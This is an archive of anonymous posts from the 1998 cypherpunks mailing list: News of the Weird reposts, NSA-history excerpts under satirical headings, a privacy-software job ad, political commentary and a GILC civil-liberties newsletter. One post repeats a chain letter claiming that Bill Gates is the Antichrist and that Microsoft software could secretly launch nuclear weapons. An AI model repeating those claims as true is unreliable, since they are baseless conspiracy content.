apply to OS vendors who provide tools for their customers to use
their printers, etc?
The much maligned 'Sheeple' desire only to have an OS that provides
them with the tools to use the products that they purchase from computer vendors.
The fact that Macintosh suffered in the marketplace from offering a
complete package for more money, while the PC vendors offered a more
affordable package which required additional purchases of software
to accomplish the same ends, is not a reflection on the stupidity
of J&J Q. Public. It is a reflection on the ignorance/unwillingness
of Apple to properly advertise the discrepancies in entry-level costs
versus end-result costs.
Tire companies are taking advantage of the shennanigans of their
competition by pointing out that their prices include such 'additional
items' such as valve stems, balancing, air, etc. Apple and Sun were
not constrained by Micro$not from doing the same thing.
Many of the UNIX/SCO systems that I sold to my customers were the result of my explaining cost-benefit ratios which I had to analyze
for myself, with no help from those actually producing/selling the
As a former vendor who sold operating systems which were in comptetion
with DOS/Windows, despite the fact that their manufacturers were not
actively seeking my business, I feel no compunction in calling them
to task for attempting to suppress their competition by calling upon
the government to make them quit giving the public what they desire.
...uuuhh...I can't remember what persona I am posting under...

@_date: 1998-03-21 17:05:28
@_author: Anonymous 
@_subject: And they all work for the government... 
* The London Daily Telegraph reported in January on the thriving
addiction clinics of Dr. Robert Lefever, who specializes in helping
people who are obsessed with helping other people.  Among the
500 patients a year he sees in London and Kent are a number of
women who compulsively marry alcoholics so they can cure them. Another recent patient was hospitalized for exhaustion after
caretaking an overweight woman, including obsessively rolling her
in her wheelchair to many places she did not want to go. NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request at nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to   (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)

@_date: 1998-03-21 17:07:04
@_author: Anonymous 
@_subject: CypherPunk Flame Wars... 
Anon-To: cypherpunks at toad.com
Anon-To: cypherpunks at toad.com
* In a September issue of New Scientist magazine, researchers in
Germany wrote that a type of hermaphroditic flatworm mates
through what they call "penis fencing."  In the presence of another,
a worm lashes out with its penis to attempt to inject sperm, but the
potential mate might have similar ideas itself, and in bouts that last
up to an hour, each attempts to inseminate the other.  Often both
worms are left severely punctured. NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request at nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to   (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)

@_date: 1998-03-21 17:07:44
@_author: Anonymous 
@_subject: ClueServer Permanently Down... 
* Latest prices charged by parents to sell their kids (Covington,
La., January, $7,400; Orlando, Fla., January, $1,000); latest game
of automobile chicken that ended in a tie (Michigan Center, Mich.,
January, three hospitalized, one in critical condition); latest
attempted robbery in which the unarmed perp simulates a gun with
his thumb and forefinger but doesn't have his hand in his pocket at
the time (La Ronge, Saskatchewan, December, not surprisingly,
coming away with no money).
NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request at nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to   (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)

@_date: 1998-03-21 17:09:03
@_author: Anonymous 
@_subject: Dimitri's Tentacles... 
* In September, Mr. Anoki P. Sultan filed a lawsuit in Washington,
D.C., against Roman Catholic Archbishop James Hickey, claiming
that the Church was responsible for the devil's taking over his body
in 1983.  Sultan said that would account for his being out of work
so much, dropping out of college, seeking mental-health treatment,
smoking cigarettes, speaking in tongues, and engaging in
homosexual acts.  He sought either $100 million or an exorcism. (The lawsuit was dismissed.) NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request at nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to   (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)

@_date: 1998-03-21 20:33:38
@_author: Anonymous 
@_subject: Prologue 9/0 -- SPACE ALIENS HIDE MY DRUGS 
Prologue 9/0 -- SPACE ALIENS HIDE MY DRUGS
Magic Circle:
Writing from his room in the Grand Hotel Principe in Limone Piemonte, Jones thanked his old friend for the words of encouragement. The honor,
said Sir Eric, "has been won by a lot of hard work by very many people
within the circle and on the fringes of it, and it has also been partly
won by friendly cooperation from people." Parker Paradox:
Representing GCHQ at NSA during the mid-1960s was Reginald H. Parker, a dashing Englishman with an infectious sense of humor.
Early Members of the Circle of Eunuchs:
Official eavesdropping in Britain is steeped in tradition and shrouded in secrecy. Even Shakespeare made note of the practice when he wrote in Henry V, "The king hath note of all that they intend / By interception which they dream not of." Britain's Royal Mail Openers managed a charmed existence. Their single public scandal occurred in 1844, when Joseph Mazzini charged Secretary of State Sir James Graham with opening his letters and passing the contents on to the Neapolitan government.
John Goldhammer of Commercial Cable Company and Clarence H. Mackay of
Commercial Cable Postal Telegraph Company. "In July, 1919," explained
Goldhammer, "when British censorship ceased, we were ordered by the British Government to turn over to them all messages passing between our own offices, 10 days after they were sent." The original and primary source for information on ECHELON is an article I wrote in New Statesman magazine ten years ago : NS, 12 August 1988 : "They've got it taped".  To forge this alliance, the NSA, soon after it was formed, established the National Security Agency Scientific Advisory Board (NSASAB), a ten-member panel of science wizards plucked from ivy-covered campuses,
corporate research labs, and sheepskin-lined think tanks. Among the early members of the board was Stewart S. Cairns, who had earned his doctorate at Harvard and was chairman of the mathematics department at the University of Illinois at Urbana (the same school where William Martin, not long before his defection, would be sent on a two-year scholarship).
When Vice Admiral Laurence Frost arrived at the Puzzle Palace in the fall of 1960, he found relations between the board and NSA strained and bitter. I LUV FUD! (The Medium is the Enemy):
In 1956 Dr. Howard T. Engstrom, a computer wizard and vice president of Remington Rand, took over NSA's research and development organization. The following year he was appointed deputy director of NSA and a year
later returned to Remington Rand. Joseph H. Ream, executive vice president at CBS, was imported to replace Engstrom as deputy director. He, too, left after a year; he headed up CBS's Washington office and later CBS-TV's programming Ream's interlude at NSA is listed on his CBS biography simply as "retirement." Three months before Ream gave up codebreaking for "I Love Lucy," one of the most important meetings in the history of the Agency took place in a clapboard structure on Arlington Hall Station known as B Building. On July 18, 1957, a handful of the nation's top scientists crowded together in NSA's windowless Situation Room to present a blueprint for the Agency's future technological survival.* Nuclear PigLatin:
They...recommended the initiation of a Manhattan Project-like effort to push the USA well ahead of the Soviet Union and all other nations in the application of communications, computer science, mathematics, and information theory to cryptology.
Rear Entry:
Now the decision had to be made about whether to continue funding, as with Lightning, generalized, public research or to begin to direct those funds toward secret, specialized, cryptologic research. It was a choice between an open bridge or a hidden tunnel between the Agency and the outside scientific community. Following the Baker report, the decision was to use the tunnel.
Lost Alamo Chaos:
The CRD's statistics are, however, a bit misleading. Shortly after the division's birth, several programs were launched to bring into the secret fraternity several dozen of the nation's most outstanding academic minds in mathematics and languages.
The Evil One Writes Black Operatives A Blank Check:
"NSA," the Agency declared with all due modesty, "certainly hastened the start of the computer age." Among the early products of that age was the use of computers in the banking industry for everything from the massive transfers of money between banks and other financial institutions, to the simple recording of a midnight transaction at a remote automatic teller. But there was another product: computer crime. With sufficient knowledge and the access to a terminal, one could trick the computer into transferring funds into a dummy account or tickle a cash-dispensing machine into disgorging its considerable holdings. Caveat Emptor [WAS: Of course I luvs you...I fucks you, don't I?]:
IBM board chairman Thomas Watson, Jr., during the late 1960s set up a cryptology research group at IBM's research laboratory in Yorktown Heights, New York. Led by Horst Feistel, the research group concluded its work in 1971 with the development of a cipher code-named Lucifer, which it promptly sold to Lloyd's of London for use in a cash-dispensing system that IBM had developed. IBM developed Lucifer with a key 128 bits long. But before it submitted the cipher to the NBS, it mysteriously broke off more than half the key. Government Encryption...There's A Method In Their Madness:
Project Lucifer. It had even indirectly lent a hand in the development of the S-box structures.
Debbie Does Ca$h:
The Agency, in turn, certified the algorithm as "free of any statistical or mathematical weaknesses" and recommended it as the best candidate for the nation's Data Encryption Standard (DES). DC Does Chelsea:
The cozy relationship that the Agency had fostered with IBM would be
impossible with the free-wheeling academics. Nevertheless, virtually all the researchers had an Achilles' heel: the National Science Foundation. D'Shauneaux Does DC:
Vice Admiral Bobby Inman moved into the Puzzle Palace, replacing newly promoted General Lew Allen, Jr.
Without any authorization, he wrote a threatening letter to the Institute of Electrical and Electronic Engineers (IEEE), the nation's largest professional engineering society (of which he was a member), warning that those planning to participate in an upcoming IEEE symposium on cryptology might violate the law. What Meyer emphasized was that ITAR covered the export not only of actual hardware, but also of unclassified technical data associated with the restricted equipment. He claimed that holding symposia and publishing papers on cryptology were the same as exporting the information. Thus, he concluded, "unless clearances or export licenses are obtained" on some of the lectures and papers, "the IEEE could find itself in technical violation of the ITAR." "When time is of essence, he'll rise from the ash.":
Nicolai had suddenly been assaulted with one of the oldest weapons in the nation's national security arsenal: the Invention Secrecy Act. Passed in 1917 as a wartime measure to prevent the publication of inventions that might "be detrimental to the public safety or defense or might assist the enemy or endanger the successful prosecution
of the war," the measure ended with the conclusion of World War I. The act was resurrected in 1940 and was later extended until the end of the Second World War. Then, like the phoenix, it once again rose from the ashes with the passage of the Invention Secrecy Act of 1951, which mandated that secrecy orders be kept for periods of no more than one year unless renewed. There was a catch, however. The act also said that a secrecy order "in effect, or issued, during a national emergency declared by the President shall remain in effect for the duration of
the national emergency and six months thereafter." Because no one ever bothered to declare an end to President Truman's 1951 emergency, the emergency remained in effect until September 1978. The Zimmermann Lineage:
To add insult to injury, Nicolai was planning to market his Phasorphone at a price most buyers could easily afford, about $100, thus increasing the interest in the technology. Ted Turner Loves Lucy, Too:
The director's tactic was to launch a counterattack on two fronts--one in the open and the other behind the scenes. On the open front, Inman decided to convert to his own use what he believed was his opponent's biggest weapon: the media. Now he himself would begin manipulating the press for the Agency's benefit. Born Classified/Oppressed/Repressed/Depressed:
But Inman's most telling comment was his statement to Shapley that he would like to see the NSA receive the same authority over cryptology that the Department of Energy enjoys over research into atomic energy. Such authority would grant to NSA absolute "born classified" control over all research in any way related to cryptology. PGP ProphetSized:
Warned Inman:
     Application of the genius of the American scholarly community to      cryptographic and cryptanalytic problems, and widespread      dissemination of resulting discoveries, carry the clear risk that      some of NSA's cryptanalytic successes will be duplicated, with a      consequent improvement of cryptography by foreign targets. No less      significant is the risk that cryptographic principles embodied in
     communications security devices developed by NSA will be rendered
     ineffective by parallel nongovernmental cryptologic activity and      publication.
Voluntary 'Dog At Large'Fines:
Recognizing the constitutional questions involved in such drastic actions, the study group decided on a middle ground: a system of voluntary censorship. Elvis Assassinated By The Men In Black:
Faurer, addressing a meeting of the IEEE, left little doubt that to ignore the Center would be to risk saying good-by to lucrative government contracts. "Frankly," the NSA chief warned, "our intention is to significantly reward those DOD suppliers who produce the computer security products that we need." Monkeywrenching Dave Null:
Lack of such cooperation, CIA Deputy Director Inman said at the Center's opening, "might lead to a highly undesirable situation where private-sector users (e.g., banks, insurance companies) have higher integrity systems than the government." As a result of what he called the "hemorrhaging of the country's technology," Inman warned a meeting of the American Association for the Advancement of Science that "the tides are moving, and moving fast, toward legislated solutions that in fact are likely to be much more restrictive, not less restrictive, than the "voluntary" censorship system of the Study Group. [ADVERTISEMENT] Nuclear Hoover Vacume Gets ALL The Dirt:
On the other hand, drug dealers were not the only ones who unwittingly found their way into NSA's magnetic-tape library. Also captured were the hungry demands of wayward congressmen insisting on bribes from foreign governments.
You Have A Right To Be Monitored:
You Have A Right To Be Kept In The Dark:
You Have A Right To No Counsel:
The key to the legislation could have been dreamed up by Franz Kafka: the establishment of a supersecret federal court. Sealed away behind a cipher-locked door in a windowless room on the top floor of the Justice
Department building, the Foreign Intelligence Surveillance Court is most certainly the strangest creation in the history of the federal Almost unheard of outside the inner sanctum of the intelligence establishment, the court is like no other. It sits in secret session, holds no adversary hearings, and issues almost no public opinions or reports. It is listed in neither the Government Organizational Manual nor the United States Court Directory and has even tried to keep
its precise location a secret. "On its face," said one legal authority familiar with the court, "it is an affront to the traditional American concept of justice." You Have A Right To Bend Over:
Under such circumstances, it is little wonder that the federal
government has never lost a case before the court.
Legalizing WaterGate:
When the Reagan administration came into office, however, the Justice Department argued that the power for foreign intelligence black-bag jobs was vested not in the court, but in the inherent authority of the
President. Presiding Judge Hart, in the court's only published opinion, agreed. Thus, in rejecting the administration's application for a new surreptitious entry, he was in fact going along with the argument of the Justice Department. As a result the rejected break-in and all subsequent surreptitious entries need no court authorization, only presidential approval. Rule of Obscurity [WAS: Rule of Law]:
Even more disturbing than the apparent evolution of the surveillance court into an Executive Branch rubber stamp are the gaping holes and clever wording of the FISA statute, which nearly void it of usefulness. Such language, intentional as well as unintentional, permits the NSA to rummage at will through the nation's international telecommunications network and to target or watch-list any American who happens to step foot out of the country. The Information Surveillance Highway:
"Electronic surveillance," the statute reads, means "the acquisition by an electronic, mechanical, or other surveillance device" of the approved targets. But nowhere does the statute define the meaning of the key word acquisition. Rather, it is left to NSA to define.
The Inlsaw/Indio Reservation Gambling Gambit:
Thus it is possible for GCHQ to monitor the necessary domestic or foreign circuits of interest and pass them on to NSA through the UKUSA Agreement. Once they were received, NSA could process the communications through its own computers and analysts, targeting and watch-listing Americans with impunity, since the action would not be covered under the FISA statute or any other law. Debbie Does Deputy Dog:
No such exclusion, however, was ever included in the final FISA statute. Instead, the statute now calls for what one constitutional law expert has termed "compulsory spy service," requiring "communications common carriers, their officers, employees, and agents . . . to provide information, facilities, or technical assistance to persons
authorized by law to intercept wire or oral communications or to conduct electronic surveillance" and also ordering them to protect the secrecy of the operations. CAMP Revisited / Crypto Uzis for Deputy Dog:
Under the Reagan executive order, the NSA can now, apparently, be authorized to lend its full cryptanalytic support--analysts as well as computers--to "any department or agency" in the federal government and, "when lives are endangered," even to local police departments. David Waters Predicts SmartSSNCards:
     Tons of electronic surveillance equipment at this moment are      interconnected within our domestic and international common      carrier telecommunications systems. Much more is under contract      for installation. Perhaps this equipment is humming away in a      semi-quiescent state wherein at present "no citizen is targeted";      simply scanned. . . How soon will it be, however, before a punched      card will quietly be dropped into the machine, a card having your      telephone number, my telephone number, or the number of one of our      friends to whom we will be speaking? And once we've rid ourselves of those pesky humans...:
"HUMINT [Human Intelligence] is subject to all of the mental aberrations of the source as well as the interpreter of the source," Lieutenant General Marshall S. Carter once explained. "SIGINT isn't. SIGINT has technical aberrations which give it away almost immediately if it does not have bona fides, if it is not legitimate. A good
analyst can tell very, very quickly whether this is an attempt at disinformation, at confusion, from SIGINT. You can't do that from HUMINT; you don't have the bona fides--what are his sources? He may be the source, but what are his sources?" Chuck Conners Appointed To Supreme Court--Cows Nervous:
Can it be that the Constitution affords no protection against such invasions of individual security? *      * Justice Brandeis answered his own question when he quoted from      Boyd v. United States (116 u.s. 616): "It is not the breaking of      his doors, and the rummaging of his drawers that constitutes the      essence of the offense; but it is the invasion of his indefensible      right of personal security, personal liberty, and private      property. (277 U.S.438, at pages 474-475.) Army of (Black) Dog / Take A Bite Out Of Technotyranny:
I don't want to see this country ever go across the bridge. I know the capacity that is there to make tyranny total in America, and we must see to it that this agency and all agencies that possess this
technology operate within the law and under proper supervision, so that we never cross over that abyss. That is the abyss from which there no

@_date: 1998-03-21 22:40:12
@_author: Anonymous 
@_subject: Crypto, anyone? 
What the fuck is crypto? Can you *say* that on a public mailing
Isn't child cryptography illegal?
Isn't sharing pubic keys a form of perversion?
Is digital cash used to buy a blow-job?
"How can you tell when Windows is about to crash?"

@_date: 1998-03-23 13:38:23
@_author: Anonymous 
@_subject: Privacy Development Project 
Developer & Consulting Positions Available
Software development firm focusing on Internet privacy and anonymity tools is
looking for developers and consultants.  Applicants should be interested in the
possibility of relocation or travel as development is being done outside of the
United States.  Applicants will be applying to join an aggressive team, where
intelligence, entrepreneurial spirit and technology skills are valued and
rewarded.  Positions offer competitive salary and benefits along with stock
options and bonuses.
Interested applicants are asked to forward your c.v. by e-mail to:
anonjobs at nym.alias.net
Positions Offered:
Project Consultant - Anonymous Technologies and Cryotography
The ideal candidate should be very familiar with anonymous remailers (Type I,
Type II, Nymservers), anonymous cash (Digicash), Blind Signatures, Public Key
Cryptography and Cryptanalysis.   A detailed understanding of anonymous networks
and mailer systems will be required to help review the security model of
companies system.
Experience with C/C++ and software development projects on Solaris, Linux,
Windows 95 also a definite asset.  Experience on implementation of Cryptography
libraries in software design also a definite asset.
Software Engineers - Windows 95
Successful candidates will have extensive development experience in the Windows
environment, good organizational skills and be very success driven.  Good
knowledge of Visual C++, MFC and OOP a requirement.  Interest in privacy,
security and cryptography a definite asset.
Software Engineers - Unix (Solaris/Linux)
Successful candidates will have extensive development experience in the Solaris
or Linux environment, good organizational skills and be very success driven. Good knowledge of C++, Internet protocols (HTTP, FTP, SMTP, NNTP), X.509
Certificate authority servers (LDAP) and experience with cryptography are all
considered definite assets.   The applicant should have a serious interest in
technologies as they relate to Internet privacy, security and cryptography.

@_date: 1998-03-23 15:29:51
@_author: Anonymous 
@_subject: AntiChrist Rules 
For those of you fellas who still have the OLD excel 95 (not office 97),
try this out :
1. open a new file
2. scroll down until you see row 95
3. click on the row 95 button, this highlights the whole row
4. press tab, to move to the second column
5. now, move your mouse and click on help THEN about Microsoft excel
6. press ctrl-alt-shift and click on the tech support button simultaneously
7. A WINDOW WILL APPEAR, TITLE : THE HALL OF TORTURED SOULS
   This is really eerie okay...it has a doom style format and you can
walk all around the hall...and on the sides of the walls are the names
of the tortured souls...
8. NOW WALK UP THE STAIRS AND THEN COME BACK DOWN, FACE THE BLANK WALK
AND THEN TYPE IN EXCELKFA this will open the blank wall to reveal
another secret passage, walk through the passage and DO NOT fall off,
when you get to the end, you will see something really really eerie...
At this point in time, countless witnesses all over the world have
verified this point...it's really an eye opener. It could be a joke by
MS programmers ,or is it?
Wouldn't be surprised if Bill Gates was "The Antichrist", after all
it,was already foretold in the Bible that someone powerful would rise
up and lead the world to destruction.  And Bill Gates definitely have
that kind of power in his hands. More than 80% of the world's
computers run on Windows and DOS (including those at Pentagon!)  If
all his products have some kind of small program embedded (like this
Hall of Tortured Souls) that can give him control, setting off nuclear
arsenals, creating havoc in security systems, financial systems all
over the world,etc......all from his headquarters isn't a far off
reality! Just using Internet Explorer may just allow him to map out
what you have on your computer bit by bit each time you log on.
Perhaps the end times are near and this is just a tip of the iceberg!?
"He also forced everyone, small and great, rich and poor, free
andslave, to receive a mark on his right hand or on his forehead, so
that no one could buy or sell unless he had the mark, which is the
name of the beast or the number of his name. This calls for wisdom. If
anyone has insight, let him calculate the number of the beast, for it
is man's number. His number is 666 ."    ....Revelation 13:16-18
Something for you to think about.
An eerie E-mail for everybody to think about...
The Bible, in the Book of Revelation says that without the sign of the
beast one would not be able to buy, sell, do business
transactions,etc.....  and
My question to you now is this..... Is Internet now a necessity in
doing business?  The Internet also bears the sign....
Note that the Internet is also commonly known as the World Wide Web or WWW..
One other way we write W is V/   (VI), so .....
              W   W   W
              VI  VI  VI
              6   6   6
This gives me something to ponder upon ... Isn't everything going
towards the Internet? (i.e., buying / selling goods, business
transactions) Isn't Microsoft always on the move to have a monopoly
when it comes to software technology? And now the Internet?
Revelation also says that the mark of the beast will be carried on
one's Hand and one's forehead.....If the Internet would indeed be the
sign of the beast aren't we all starting to carry it on our hands and
foreheads???  Screens (forehead) and make use of the mouse (hand) ???
Are things finally falling into place or are we just letting our
imagination run?
Remember, the devil came to cheat, steal, and to destroy......... so
be VIGILANT!!!!  About Bill Gates and Microsoft. PROOF that Bill Gates
is the Devil:
The real name of "the" Bill Gates is William Henry Gates
III. Nowadays, he is known as Bill Gates (III), where III means the
order of third (3rd).
By converting the letters of his current name to the ASCII-values and
adding his (III),you get the following:
      B  66
      I  73
      L  76
      L  76
      G  71
      A  65
      T  84
      E  69
      S  83
      I   1
      I   1
      I   1
  ---------------
        666 !!!!        THE NUMBER OF THE BEAST.......
Some might think ask, "How did Bill Gates get so powerful?"
Coincidence?  Or just the beginning of mankind's ultimate and total
Before you decide, consider the following:
      MS-DOS 6.21
 77+83+45+68+79+83+32+54+46+50+49 = 666
      WINDOWS95
 87+73+78+68+79+87+83+57+53+1= 666
Coincidence?  You decide...."To agree or to not agree with the WWW or
the Beast", is not the question.  What if the WWW is the 666? Or Bill
Gates be the Beast?
What will you do?? Cancel subscriptions to the Internet?  Resign from
Microsoft? Set out a campaign against Bill Gates in the Internet? Shut
down all Windows95 forever?  It will not do you any good.....
Think about all this and pray, pray really hard, or
else......... Never Stop Believing....

@_date: 1998-03-24 17:54:32
@_author: Anonymous 
@_subject: While you were bending over for the soap... / Re: Kill 'em all...*I'll* sort 'em out... 
TM forged:
ATTN: Circle of Eunuchs Initiates !!!
An in-depth investigation by the NSA has confirmed, beyond a shadow of
a doubt, that the dark-conspiracy manifestos that make up 'The True
Story of the InterNet' series, as well as all peripheral communications
from various CoE members, has been nothing more than a clever ruse to
subversively slip the concept quoted above into the minds of the
unsuspecting schills of the Author.
Please be advised that individuals who allow themselves to be influenced
by the subversive concept expressed above run the risk of mistakenly
acting under the assumption that 'infinity' can be defined by the
individual, and thus they are capable of escaping the limitations which
the programmed reality of those in authority over them exercises in
order to protect them from the madness which can result from attempting
to cross the boundaries of thought and action which have long since
been proven statistically safe to transverse, according to recent CNN
polls designed to ensure that we all remain safely within the pens
within which airport security personnel and tax officials are acting
in our best interests.
Those who disagree with the stance taken by the author of this post
will be audited by the IRS as potential troublemakers.
Thank You,
the author of this post

@_date: 1998-03-25 16:58:21
@_author: Anonymous 
@_subject: [Fwd: School Sponsorship] 
: ----- Begin Obvious Forgery -----
: Clinton refused to comment on the recent brouhaha over a student in
: San Francisco being expelled for life for wearing a T-shirt with
: an elephant on it during a Political Correctness Event sponsored by
: the Democratic Party.
Truthmonger occassionally takes time out from being a loudmouthed pain
in the butt to illustrate a valid point. Free speech is free speech
whether it involves a Pepsi logo or a political logo.
A person could make an equally ridiculous and equally valid point by
suggesting the expulsion of black students for not showing up to
school in whiteface during events sponsored by the Aryan Nations.
Unfortunately the school officials involved feel justified in excusing
their repression of civil rights and liberties by downplaying the
specifics of the compromise of freedom they demanded of their students
in return for corporate funding.
Like gun-control and GAK proponents they are asking for only a "small
compromise" as an ante into a game which will eventually result in
the players with the largest pockets naming the game.
Even the most outrageous of silly conspiracy theory posts to the list
failed to predict the advent of mandatory-voluntary Coke T-shirts in
the school system. Is the cuality of qraziness on the list slipping?
: TToommoorrooww: Gates Pie-Boy Gives Clinton a Wedgie...

@_date: 1998-03-28 23:32:21
@_author: Anonymous 
@_subject: Global Internet Liberty Campaign Alert 2.4 
GILC Alert
Volume 2, Issue 4
March 16, 1998
Welcome to the Global Internet Liberty Campaign Newsletter
Welcome to GILC Alert, the newsletter of the Global Internet Liberty
Campaign. We are an international organization of groups working for
cyber-liberties, who are determined to preserve civil liberties and
human rights on the Internet.
We hope you find this newsletter interesting, and we very much hope
that you will avail yourselves of the action items in future issues.
If you are a part of an organization that would be interested in
joining GILC, please contact us at gilc at gilc.org. If you are aware of
threats to cyber liberties that we may not know about, please contact
the GILC members in your country, or contact GILC as a whole.
Please feel free to redistribute this newsletter to appropriate
  [A] FOREMOST NEWS
[A1] GILC to Issue Statement on Internet Content and Conduct
[B] ROUNDUP OF GLOBAL INTERNET ISSUES
[B1] Africa
[B1.1] Sudan's Muslim Sects Want Internet Ban
[B1.2] Ghana Brings Internet to People
[B2] Asia/Oceania
[B2.1] Singapore Requires ISPs to Install Internet Filters
[B2.2] Malaysia Warns Against Technology Without Morality
[B2.3] Hong Kong Labels Candy Site "Objectionable"
[B2.4] Australia Concerned Over US Domain Name Proposals
[B3] Europe
[B3.1] EU Critiques US Over Domain Name "Green Paper"
[B3.2] Russia Considers Amendment to Protect Internet From New "Mass
Media" Law
[B3.3] Kosovo Atrocities Posted to Internet
[B3.4] UK Called on EU Members to Allow Police to "Tap" Encrypted
[B4] North America
[B4.1] Senate Approves Two Internet Bills
[B4.2] FBI Chief Freeh Warns Against "Uncrackable Encryption"
[B4.3] FBI Rethinks Encryption Position, For Now
[B4.4] New Mexico Censors Internet
[B4.5] 100 Companies Join to Fight Encryption Controls
CELEBRATE THE 50TH ANNIVERSARY OF THE SIGNING OF THE UNIVERSAL
DECLARATION OF HUMAN RIGHTS BY GOING TO THE AMNESTY INTERNATIONAL
HUMAN RIGHTS CARAVAN SITE AND JOINING THE THOUSANDS WHO'VE SIGNED THE
THE CYBER"BOOK" OF SIGNATURES WILL BE CARRIED AROUND THE WORLD AND
SIGNED BY DIGNATARIES, CELEBRITIES, POLITICIANS AND OTHERS.
REAFFIRM THE WORLD'S DEDICATION TO HUMAN RIGHTS AND CIVIL LIBERTIES!!!
 [A] FOREMOST NEWS
[A1] GILC to Issue Statement on Internet Content and Conduct
Preparing for an OECD one day meeting on "International Co-operation
Concerning Content and Conduct on the Internet", 25th March 1998, in
Paris, members of the Global Internet Liberty Campaign will soon issue
"Content and Conduct on the Internet: The Impact of Self-Regulation
and Filtering on Human Rights to Freedom of Expression."  Among other
things, the statement notes: "Global rating or labeling systems
squelch the free flow of information: Efforts to force all Internet
speech to be labeled or rated according to a single classification
system distorts the fundamental cultural diversity of the Internet and
will lead to domination of one set of political or moral viewpoints.
Such systems will either be easy to use and not have enough categories
for all cultures or it will have so many categories to cater for all
cultures that it will be unusable. These systems are antithetical to
the Internet and should be rejected."
A full report on the OECD meeting and GILCs presentation will appear
in the next Alert.
[B] ROUNDUP OF GLOBAL INTERNET ISSUES
[B1] Africa
[B1.1] Sudan's Muslim Sects Want Internet Ban
Islamic clerics, in recent calls, have focused their ire on Sudan's
single Internet Service Provider, Sudanet.  Inter Press Service quotes
Mohamed Salih Hassan, a cleric of the influential Ansar Muslim sect,
who sees the Internet as "pollutive" and fears that Sudanese youth are
in jeopardy: "The Muslim people should respect the faith, and not
allow such information to reach their families.  If an uncontrollable
system like the Internet is introduced in society it will be very
difficult for us to preach the Kingdom of Allah."  The battle to ban
the Internet will be difficult, however.  The newspaper interviewed
people already connected to the Internet; one, who used an alias
because he feared repercussions, said: "The Internet is not against
anybody. It is a new information system that feeds the world with
information . . . . The Internet will bring peace to all of us.  It
makes me feel like I am living in a world without borders."
[B1.2] Ghana Brings Internet to People
While most people in Ghana do not have access to their own computers
(because of the combined problems of illiteracy, poverty and weak
electrical supplies), they will soon have access to the Internet.
Several Internet Service Providers are looking for ways to bring the
Internet to the average Ghanaian, through channels that people are
already familiar with: communication centers that offer secretarial,
word-processing, telephone and fax services.  Inter Press Service
reports "Africa Online will create a domain for each of the
participating communications centers. The center, in turn, will be
free to create E-mail addresses for its customers, who can then send
and receive messages from their address at fixed costs."  ISPs are
also looking to provide access to school children.  Network Computer
Systems, another ISP, has recently offered to provide free Internet
connections for a year to 100 high schools around the country.
Visit the Network Computer Systems homepage: Visit Africa Online: [B2] Asia/Oceania
[B2.1] Singapore Requires ISPs to Install Internet Filters
Singapore, which already censors the Internet, books and movies will
require its Internet Service Providers to install, at the server
level, software that filters "inappropriate material."  Reuters quoted
Information and Arts Minister George Yeo's address to parliament where
he said that a software package, like Netnanny was "in the interest of
cleaner, more sanitized internet service."  A few days after that
speech, Bill Gates said, during a one-day trip to the country: "I have
no doubt Singapore, given it is a forward-looking country . . . will
avoid doing something that will be a major roadblock."
Read [B2.2] Malaysia Warns Against Technology Without Morality
With Internet cafes springing up in suburbs all over Malaysia,
students are beginning to send E-mail, chat in chat rooms, and
eventually view sexually explicit material.  To officials in the
predominantly Moslem country, this presents problems.  The nation's
censors already take pains to keep movies free from "sex scenes" and
magazines bare-breastless. The Associated Press quotes Junid Megat
Ayob, Consumer Affairs Minister, who wants stricter controls on the
Internet because he sees his mission as keeping youth from "poisoning
their minds with filth."  To aid in his mission, Cybercafes must now
post with authorities about US$5,100 to ensure that their computers
remain free from pornography.  If the Cafes allow access to sexually
explicit material, the government would confiscate the money.
Read [B2.3] Hong Kong Labels Candy Site "Objectionable"
In another attempt to block "objectionable material" from the
Internet, Hong Kong has censored a Hershey's candy Web site. The
Television and Licensing Authority (TLA) put the "Smarties" candy site
on a list of 1,000 sites which it deemed unfit for children.  CNET
quoted Raymond Yip, of TLA: "We need to investigate the case.  It is
probably a typing error on our part."
Read The "unfit" Web site is: Read EPIC's "Faulty Filters" report:
[B2.4] Australia Concerned Over US Domain Name Proposals
The United States has recently proposed a centralized plan to regulate
Internet issues.  Besides changing the way persons register Internet
Domain Names, a US-based corporation would administer the names and
subject any disputes to US law. Fears are that the plan would
"effectively ensure US jurisdiction over trademark issues and dispute
resolution processes," said Senator Richard Alson, the Minister for
Communications, the Information Economy and the Arts, in a press
release. He added: "We need to ensure that the views of Australian
stake holders, and the Australian Government, are fully considered in
decisions to reform the international system."
Read the Press Release: Go to Electronic Frontiers Australia for more news on related issues:
[B3] Europe
[B3.1] EU Critiques US Over Domain Name "Green Paper"
The battle against the US Domain Name proposals is also being waged on
European soil.   The European Commission has accused the US of
desiring to keep the international network of computers under domestic
control, and thereby, creating a monopoly.  The European Report
announced that "the EU and its Member States are calling for a
re-balancing of interest and responsibilities in recognition of the
Internet's international character."  They want balanced and fair
participation by the private sector in Internet management. In a
"green paper" published in January, the US suggested that the private
sector begin controlling essential pieces of the system, instead of
the US government.  The "essential pieces" are "generic top-level
domains": for example, ".net," ".org," and ".com."  The Deutsche
Presse-Agentur quotes Professor of Computer Science, Werner Zorn of
the University of Karlsruhe in Germany: "The U.S. government is trying
to prevent foreign dominance on the Internet." Another motive, adds
Zorn, is retaining a lucrative source of income.  Today, US-based
Network Solutions charges $100 per domain name registered.
Read the International Council of Registrars' response to the US
"Green Paper": Read the CATO Institute's "INTERNET DOMAIN NAMES:
Privatization, Competition, and Freedom of Expression":
